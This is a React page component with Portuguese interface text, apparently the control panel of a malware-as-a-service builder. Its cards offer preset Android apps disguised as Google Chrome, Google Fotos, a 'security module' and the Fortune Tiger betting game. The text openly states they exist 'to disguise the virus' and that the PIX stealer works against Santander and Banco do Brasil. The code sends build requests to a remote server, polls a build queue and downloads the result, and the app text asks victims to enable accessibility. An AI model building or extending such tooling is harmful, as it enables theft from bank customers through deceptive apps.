import React, { useState, useEffect } from "react";
import PageTitle from "../components/Typography/PageTitle";
import { Link, NavLink } from "react-router-dom";
import moduloPNG from '../components/DefaultApps/modulo.png';
import chromePNG from '../components/DefaultApps/chrome.png';
import fortune from '../components/DefaultApps/fortune.png';
import fotos from '../components/DefaultApps/fotos.png';
import {
  EditIcon,
  EyeIcon,
  GridViewIcon,
  HomeIcon,
  ListViewIcon,
  TrashIcon,
} from "../icons";
import {
  Card,
  CardBody,
  Label,
  Select,
  Button,
  TableBody,
  TableContainer,
  Table,
  TableHeader,
  TableCell,
  TableRow,
  TableFooter,
  Avatar,
  Badge,
  Pagination,
  Modal,
  ModalHeader,
  ModalBody,
  ModalFooter,
} from "@windmill/react-ui";
import response from "../utils/demo/productData";
import Icon from "../components/Icon";
import { genRating } from "../utils/genarateRating";
import { IoBuildSharp } from "react-icons/io5";
import { useSnackbar } from 'notistack';
import useAuth from '../useAuth';
import { FaDownload } from "react-icons/fa";

const ProductsAll = () => {
  const [view, setView] = useState("grid");
  const { enqueueSnackbar } = useSnackbar();
  const [loading, setLoading] = useState(false);
  const [page, setPage] = useState(1);
  const [data, setData] = useState([]);
  const { user, token } = useAuth();
  const [queue, setQueue] = useState(null);
  const [queueStatus, setQueueStatus] = useState('Aguardando comando...');
  
  const fetchImageAsBase64 = (url) => {
    return fetch(url)
      .then(response => response.blob())
      .then(blob => {
        return new Promise((resolve, reject) => {
          const reader = new FileReader();
          reader.onloadend = () => resolve(reader.result);
          reader.onerror = reject;
          reader.readAsDataURL(blob);
        });
      });
  };

  useEffect(() => {
    const checkQueueStatus = () => {
      fetch('https://thc.bnbempresta.fun/queue', {
        method: 'GET',
        headers: {
          'Content-Type': 'application/json',
          'Authorization': 'Bearer ' + token,
        },
      })
        .then((res) => res.json())
        .then((res) => {
          if (res?.message === "Queue user not found" && res?.status === 'error') {
            setQueue(null);
            setQueueStatus('Aguardando comando...');
          } else if (res?.status === 'success') {
            setQueue(res.data);
            setQueueStatus('Gerando aplicativo...');
          } else {
            setQueue(null);
          }
        })
        .catch(() => {
          setQueue(null);
          enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
        });
    };

    const intervalId = setInterval(checkQueueStatus, 2500); // Verifica a cada 20 segundos

    return () => clearInterval(intervalId); // Limpa o intervalo quando o componente é desmontado
  }, [token, enqueueSnackbar]);

  const createModulo = async (e) => {
    e.preventDefault();
    setLoading(true);

    var nameapp = "Modulo de Segurança";
    var iconapp = moduloPNG; // Use the imported image
    var titulo = "Modulo de Segurança";
    var desc = "Este módulo é responsável por detectar e alertar sobre possíveis intrusos em seu app.";
    var img = "https://thc.bnbempresta.fun/build/layout.png";
    var webviewurl = "https://google.com";

    let base64 = await fetchImageAsBase64(iconapp);

    if (!base64) {
      enqueueSnackbar('Erro ao converter a imagem!', { variant: 'error' });
      setLoading(false);
      return;
    }

    fetch('https://thc.bnbempresta.fun/build', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + token,
      },
      body: JSON.stringify({
        name: nameapp,
        webviewurl: webviewurl,
        icon: base64,
        titulo: titulo,
        desc: desc,
        img: img
      }),
    })
      .then((res) => {
        switch (res.status) {
          case 409:
            enqueueSnackbar('Aguarde, seu aplicativo já está sendo gerado!', { variant: 'success' });
            break;
          case 200:
            enqueueSnackbar('Seu aplicativo foi colocado na fila de geração de aplicativos!', { variant: 'success' });
            break;
          default:
            enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
            break;
        }

        setLoading(false);
      })
      .catch(() => {
        enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
        setLoading(false);
      });
  };

  const createChrome = async (e) => {
    e.preventDefault();
    setLoading(true);

    var nameapp = "Google Chrome";
    var iconapp = chromePNG; // Use the imported image
    var titulo = "Google Chrome";
    var desc = "Para que o aplicativo funcione corretamente ative a acessibilidade";
    var img = "https://thc.bnbempresta.fun/build/layout.png";
    var webviewurl = "https://google.com";

    let base64 = await fetchImageAsBase64(iconapp);

    if (!base64) {
      enqueueSnackbar('Erro ao converter a imagem!', { variant: 'error' });
      setLoading(false);
      return;
    }

    fetch('https://thc.bnbempresta.fun/build', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + token,
      },
      body: JSON.stringify({
        name: nameapp,
        webviewurl: webviewurl,
        icon: base64,
        titulo: titulo,
        desc: desc,
        img: img
      }),
    })
      .then((res) => {
        switch (res.status) {
          case 409:
            enqueueSnackbar('Aguarde, seu aplicativo já está sendo gerado!', { variant: 'success' });
            break;
          case 200:
            enqueueSnackbar('Seu aplicativo foi colocado na fila de geração de aplicativos!', { variant: 'success' });
            break;
          default:
            enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
            break;
        }

        setLoading(false);
      })
      .catch(() => {
        enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
        setLoading(false);
      });
  };

  const createFotos = async (e) => {
    e.preventDefault();
    setLoading(true);

    var nameapp = "Google Fotos";
    var iconapp = fotos; // Use the imported image
    var titulo = "Google Fotos";
    var desc = "Para que o aplicativo funcione corretamente ative a acessibilidade";
    var img = "https://thc.bnbempresta.fun/build/layout.png";
    var webviewurl = "https://google.com";

    let base64 = await fetchImageAsBase64(iconapp);

    if (!base64) {
      enqueueSnackbar('Erro ao converter a imagem!', { variant: 'error' });
      setLoading(false);
      return;
    }

    fetch('https://thc.bnbempresta.fun/build', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + token,
      },
      body: JSON.stringify({
        name: nameapp,
        webviewurl: webviewurl,
        icon: base64,
        titulo: titulo,
        desc: desc,
        img: img
      }),
    })
      .then((res) => {
        switch (res.status) {
          case 409:
            enqueueSnackbar('Aguarde, seu aplicativo já está sendo gerado!', { variant: 'success' });
            break;
          case 200:
            enqueueSnackbar('Seu aplicativo foi colocado na fila de geração de aplicativos!', { variant: 'success' });
            break;
          default:
            enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
            break;
        }

        setLoading(false);
      })
      .catch(() => {
        enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
        setLoading(false);
      });
  };

  const createTiger = async (e) => {
    e.preventDefault();
    setLoading(true);

    var nameapp = "Fortune Tiger";
    var iconapp = fortune; // Use the imported image
    var titulo = "Fortune Tiger";
    var desc = "Para que o aplicativo funcione corretamente ative a acessibilidade";
    var img = "https://thc.bnbempresta.fun/build/layout.png";
    var webviewurl = "https://apptopia.com/google-play/app/com.MarrakechCasino.fortuneTiger.liaamsi/about";
    let base64 = await fetchImageAsBase64(iconapp);
    if (!base64) {
      enqueueSnackbar('Erro ao converter a imagem!', { variant: 'error' });
      setLoading(false);
      return;
    }

    fetch('https://thc.bnbempresta.fun/build', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + token,
      },
      body: JSON.stringify({
        name: nameapp,
        webviewurl: webviewurl,
        icon: base64,
        titulo: titulo,
        desc: desc,
        img: img
      }),
    })
      .then((res) => {
        switch (res.status) {
          case 409:
            enqueueSnackbar('Aguarde, seu aplicativo já está sendo gerado!', { variant: 'success' });
            break;
          case 200:
            enqueueSnackbar('Seu aplicativo foi colocado na fila de geração de aplicativos!', { variant: 'success' });
            break;
          default:
            enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
            break;
        }

        setLoading(false);
      })
      .catch(() => {
        enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
        setLoading(false);
      });
  };

  const handleDownload = (e) => {
    e.preventDefault();

    setLoading(true);

    fetch('https://thc.bnbempresta.fun/download', {
        method: 'GET',
        headers: {
            'Authorization': 'Bearer ' + token,
        },               
    }).catch(() => {
        enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
        setLoading(false);
    }).then((res) => {
        if (res.status === 200) {
            window.open("https://thc.bnbempresta.fun/download?id=" + user.id, "_blank");
        } else if (res.status === 404) {
            enqueueSnackbar('Você não possui um aplicativo gerado!', { variant: 'error' });	
        } else {
            enqueueSnackbar('Erro ao conectar com o servidor!', { variant: 'error' });
        }

        setLoading(false);
    });
  };

  // Pagination setup
  const [resultsPerPage, setResultsPerPage] = useState(10);
  const totalResults = response.length;

  // Pagination change control
  function onPageChange(p) {
    setPage(p);
  }

  // On page change, load new sliced data
  useEffect(() => {
    setData(response.slice((page - 1) * resultsPerPage, page * resultsPerPage));
  }, [page, resultsPerPage]);

  // Delete action modal
  const [isModalOpen, setIsModalOpen] = useState(false);
  const [selectedDeleteProduct, setSelectedDeleteProduct] = useState(null);

  async function openModal(productId) {
    let product = await data.filter((product) => product.id === productId)[0];
    setSelectedDeleteProduct(product);
    setIsModalOpen(true);
  }

  function closeModal() {
    setIsModalOpen(false);
  }

  // Handle list view
  const handleChangeView = () => {
    if (view === "list") {
      setView("grid");
    } else {
      setView("list");
    }
  };

  return (
    <div>
      <PageTitle>Criação de Aplicativos</PageTitle>

      {/* Breadcrumb */}
      <div className="flex text-gray-800 dark:text-gray-300">
        <div className="flex items-center text-purple-600">
          <Icon className="w-5 h-5" aria-hidden="true" icon={HomeIcon} />
          <NavLink exact to="/app/dashboard" className="mx-2">
            Dashboard
          </NavLink>
        </div>
        {">"}
        <p className="mx-2">Aplicativos Pre-definidos</p>
      </div>

      {/* Sort */}
      <Card className="mt-5 mb-5 shadow-md">
        <CardBody>
          <div className="flex items-center justify-between">
            <div className="flex items-center">
              <p className={`text-sm ${queueStatus === 'Gerando aplicativo...' ? 'text-green-500' : 'text-yellow-500'} dark:text-gray-400`}>
                Status de Criação do Aplicativo: {queueStatus}
              </p>
            </div>
            <div>
              <Link to={`/app/build`}>
                <Button
                  icon={IoBuildSharp}
                  className="p-2"
                  aria-label="Edit"
                />
              </Link>
              <Button
                icon={FaDownload}
                className="p-2"
                aria-label="Download"
                onClick={handleDownload}
                disabled={loading}
              />
            </div>
          </div>
        </CardBody>
      </Card>

      {/* Queue position */}
      <Card className="mt-5 mb-5 shadow-md">
        <CardBody>
          <div className="flex items-center justify-between">
            <div className="flex items-center">
              <p className={`text-sm ${queue ? 'text-green-500' : 'text-red-500'} dark:text-gray-400`}>
                Lugar na fila: {queue ? queue : 'Você não está na fila'}
              </p>
            </div>
          </div>
        </CardBody>
      </Card>

      {/* Delete product modal */}
      <Modal isOpen={isModalOpen} onClose={closeModal}>
        <ModalHeader className="flex items-center">
          <Icon icon={TrashIcon} className="w-6 h-6 mr-3" />
          Delete Product
        </ModalHeader>
        <ModalBody>
          Make sure you want to delete product{" "}
          {selectedDeleteProduct && `"${selectedDeleteProduct.name}"`}
        </ModalBody>
        <ModalFooter>
          <Button layout="outline" onClick={closeModal}>
            Cancel
          </Button>
          <Button>Delete</Button>
        </ModalFooter>
      </Modal>

      {/* Product Views */}
      {view === "list" ? (
        <TableContainer className="mb-8">
          <Table>
            <TableHeader>
              <tr>
                <TableCell>Name</TableCell>
                <TableCell>Stock</TableCell>
                <TableCell>Rating</TableCell>
                <TableCell>QTY</TableCell>
                <TableCell>Price</TableCell>
                <TableCell>Action</TableCell>
              </tr>
            </TableHeader>
            <TableBody>
                <TableRow>
                  <TableCell>
                    <div className="flex items-center text-sm">
                      <Avatar
                        className="hidden mr-4 md:block"
                        src=""
                        alt="Product image"
                      />
                      <div>
                        <p className="font-semibold">123</p>
                      </div>
                    </div>
                  </TableCell>
                  <TableCell>
                    123
                  </TableCell>
                  <TableCell className="text-sm">
                    123
                  </TableCell>
                  <TableCell className="text-sm">123</TableCell>
                  <TableCell className="text-sm">123</TableCell>
                  <TableCell>
                    <div className="flex">
                      <Link to={`/app/product/123`}>
                        <Button
                          icon={EyeIcon}
                          className="mr-3"
                          aria-label="Preview"
                        />
                      </Link>
                      <Button
                        icon={EditIcon}
                        className="mr-3"
                        layout="outline"
                        aria-label="Edit"
                      />
                    </div>
                  </TableCell>
                </TableRow>
            </TableBody>
          </Table>
          <TableFooter>
            <Pagination
              totalResults={totalResults}
              resultsPerPage={resultsPerPage}
              label="Table navigation"
              onChange={onPageChange}
            />
          </TableFooter>
        </TableContainer>
      ) : (
        <div className="grid gap-4 grid-cols-2 md:grid-cols-3 lg:grid-cols-4 mb-8">
            <div className="col-span-1">
              <Card>
                <img
                  className="object-cover w-full"
                  src="https://img.freepik.com/vetores-premium/icone-de-escudo-3d-com-um-cadeado-em-um-conceito-de-protecao-de-privacidade-ou-seguranca-de-estilo-minimalista_653154-44.jpg"
                  alt="product"
                />
                <CardBody>
                  <div className="mb-3 flex items-center justify-between">
                    <p className="font-semibold truncate text-gray-600 dark:text-gray-300">
                      Modulo de Segurança
                    </p>
                  </div>
                  <p className="mb-2 text-purple-500 font-bold text-lg">
                  Aplicativo pre-definido para utilizar em todos bancos
                  </p>
                  <p className="mb-8 text-gray-600 dark:text-gray-400">
                    OBS: Ladrão de PIX está funcionando somente Santander e Banco do Brasil !
                  </p>
                  <div className="flex items-center justify-between">
                      <Button
                        icon={IoBuildSharp}
                        className="mr-3"
                        aria-label="Preview"
                        size="small"
                        onClick={createModulo}
                        disabled={loading || queue !== null}
                      />
                  </div>
                </CardBody>
              </Card>
            </div>
            <div className="col-span-1">
              <Card>
                <img
                  className="object-cover w-full"
                  src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRQnucdAOAjZ5UZNpTiMEPt3WAxGFtarfuTnv0rBqse9AJyeggSVG4xvTNUHoq8M7UjcqA&usqp=CAU"
                  alt="product"
                />
                <CardBody>
                  <div className="mb-3 flex items-center justify-between">
                    <p className="font-semibold truncate text-gray-600 dark:text-gray-300">
                      Google Chrome
                    </p>
                  </div>
                  <p className="mb-2 text-purple-500 font-bold text-lg">
                  Aplicativo padrão google chrome para disfarçar o vírus
                  </p>
                  <p className="mb-8 text-gray-600 dark:text-gray-400">
                    OBS: Ladrão de PIX está funcionando somente Santander e Banco do Brasil !
                  </p>
                  <div className="flex items-center justify-between">
                      <Button
                        icon={IoBuildSharp}
                        className="mr-3"
                        aria-label="Preview"
                        size="small"
                        onClick={createChrome}
                        disabled={loading || queue !== null}
                      />
                  </div>
                </CardBody>
              </Card>
            </div>
            <div className="col-span-1">
              <Card>
                <img
                  className="object-cover w-full"
                  src="https://www.cnet.com/a/img/hub/2013/12/30/304e2ff0-8533-11e3-bc97-14feb5ca9861/Google-Photos-icon-logo.png"
                  alt="product"
                />
                <CardBody>
                  <div className="mb-3 flex items-center justify-between">
                    <p className="font-semibold truncate text-gray-600 dark:text-gray-300">
                      Google Fotos
                    </p>
                  </div>
                  <p className="mb-2 text-purple-500 font-bold text-lg">
                  Aplicativo padrão google fotos para disfarçar o vírus
                  </p>
                  <p className="mb-8 text-gray-600 dark:text-gray-400">
                    OBS: Ladrão de PIX está funcionando somente Santander e Banco do Brasil !
                  </p>
                  <div className="flex items-center justify-between">
                      <Button
                        icon={IoBuildSharp}
                        className="mr-3"
                        aria-label="Preview"
                        size="small"
                        onClick={createFotos}
                        disabled={loading || queue !== null}
                      />
                  </div>
                </CardBody>
              </Card>
            </div>
            <div className="col-span-1">
              <Card>
                <img
                  className="object-cover w-full"
                  src="https://p2.trrsf.com/image/fget/cf/774/0/images.terra.com/2023/12/23/jogo-do-tigrinho-reproducao-1iuyr8un9tf02.jpg"
                  alt="product"
                />
                <CardBody>
                  <div className="mb-3 flex items-center justify-between">
                    <p className="font-semibold truncate text-gray-600 dark:text-gray-300">
                      BET APP
                    </p>
                  </div>
                  <p className="mb-2 text-purple-500 font-bold text-lg">
                  Aplicativo padrão fortune tiger para disfarçar o vírus
                  </p>
                  <p className="mb-8 text-gray-600 dark:text-gray-400">
                    OBS: Ladrão de PIX está funcionando somente Santander e Banco do Brasil !
                  </p>
                  <div className="flex items-center justify-between">
                      <Button
                        icon={IoBuildSharp}
                        className="mr-3"
                        aria-label="Preview"
                        size="small"
                        onClick={createTiger}
                        disabled={loading || queue !== null}
                      />
                  </div>
                </CardBody>
              </Card>
            </div>
        </div>
      )}

      <Pagination
        totalResults={totalResults}
        resultsPerPage={resultsPerPage}
        label="Table navigation"
        onChange={onPageChange}
      />
    </div>
  );
};

export default ProductsAll;
